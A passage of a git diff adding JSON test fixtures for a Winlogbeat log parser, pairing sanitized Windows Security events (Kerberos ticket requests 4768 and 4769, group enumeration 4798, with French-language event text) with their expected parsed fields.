"{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "25349190364", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json new file mode 100644 index 000000000..53d650df2 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4768.json @@ -0,0 +1,102 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": "security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json new file mode 100644 index 000000000..7b1f0f39d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4769.json @@ -0,0 +1,101 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json new file mode 100644 index 000000000..b69049f3d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4798.json @@ -0,0 +1,114 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 